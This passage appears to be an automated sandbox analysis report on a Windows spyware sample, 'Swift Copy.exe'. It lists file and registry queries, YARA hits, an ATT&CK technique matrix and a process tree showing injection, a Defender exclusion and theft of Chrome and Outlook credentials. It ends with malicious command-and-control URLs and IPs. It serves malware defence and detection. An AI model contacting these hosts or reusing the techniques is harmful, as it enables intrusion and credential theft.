          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tactic | Techniques (one line per matrix column; a leading number is the report's signature count for that technique)
          Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution | 1 Shared Modules; 1 Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
          Persistence | 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Privilege Escalation | 712 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Defense Evasion | 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 712 Process Injection; Indicator Removal from Tools; Masquerading
          Credential Access | 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery | 1 System Network Connections Discovery; 1 File and Directory Discovery; 13 System Information Discovery; 221 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
          Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
          Collection | 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Command and Control | 3 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Network Effects | Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
          Remote Service Effects | Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact | Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
          Behavior Graph ID: 682145, Sample: Swift Copy.exe, Startdate: 11/08/2022, Architecture: WINDOWS, Score: 100 (graph image not recoverable; the nodes and edges it carried are listed below)
          Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 8 other signatures. DNS/IP: www.posinet1.com
          Swift Copy.exe (started)
            dropped: C:\Users\user\AppData\...\ImUIYlbLTIh.exe (PE32); C:\Users\user\AppData\Local\...\tmpE16E.tmp (XML); C:\Users\user\AppData\...\Swift Copy.exe.log (ASCII)
            signatures: Writes to foreign memory regions; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
            -> RegSvcs.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
               -> explorer.exe (injected)
                  DNS/IP: mogdento.com 103.92.235.55, ports 49825, 49828, 80 (ZINIOSS-AS-IN ZiniosInformationTechnologyPvtLtdIN, India); kinemartigues.com 51.159.175.169, ports 49819, 49821, 80 (OnlineSASFR, France); 7 other IPs or domains
                  signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation; Uses netstat to query active network connections and open ports
                  -> NETSTAT.EXE (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
                  -> autofmt.exe (started)
            -> powershell.exe (started) -> conhost.exe (started)
            -> schtasks.exe (started) -> conhost.exe (started)

          Source | Detection | Scanner | Label | Link
          Swift Copy.exe | 21% | Virustotal | | Browse
          Swift Copy.exe | 20% | ReversingLabs | ByteCode-MSIL.Spyware.Noon |
          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe | 20% | ReversingLabs | ByteCode-MSIL.Spyware.Noon |
          Source | Detection | Scanner | Label | Link | Download
          8.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          Source | Detection | Scanner | Label | Link
          kinemartigues.com | 1% | Virustotal | | Browse
          Source | Detection | Scanner | Label | Link
          http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 | 100% | Avira URL Cloud | malware |
          http://philiphanson.org/medius/book/1.0 | 0% | Avira URL Cloud | safe |
          http://www.kinemartigues.com/bwe0/ | 100% | Avira URL Cloud | malware |
          http://schemas.micr$ | 0% | Avira URL Cloud | safe |
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          http://www.epic45.co.uk/bwe0/ | 100% | Avira URL Cloud | malware |
          www.my1245.com/bwe0/ | 100% | Avira URL Cloud | malware |
          http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== | 100% | Avira URL Cloud | malware |
          https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&amp;9rV8zl=M79ygOKZB | 0% | Avira URL Cloud | safe |
          http://www.tiro.com | 0% | URL Reputation | safe |
          http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9 | 100% | Avira URL Cloud | malware |
          http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== | 100% | Avira URL Cloud | malware |
          http://www.carterandcone.coml | 0% | URL Reputation | safe |
          http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          http://www.typography.netD | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          http://fontfabrik.com | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
          https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB | 0% | Avira URL Cloud | safe |
          http://www.mogdento.com/bwe0/ | 100% | Avira URL Cloud | malware |
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== | 100% | Avira URL Cloud | malware |
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          http://www.sakkal.com | 0% | URL Reputation | safe |
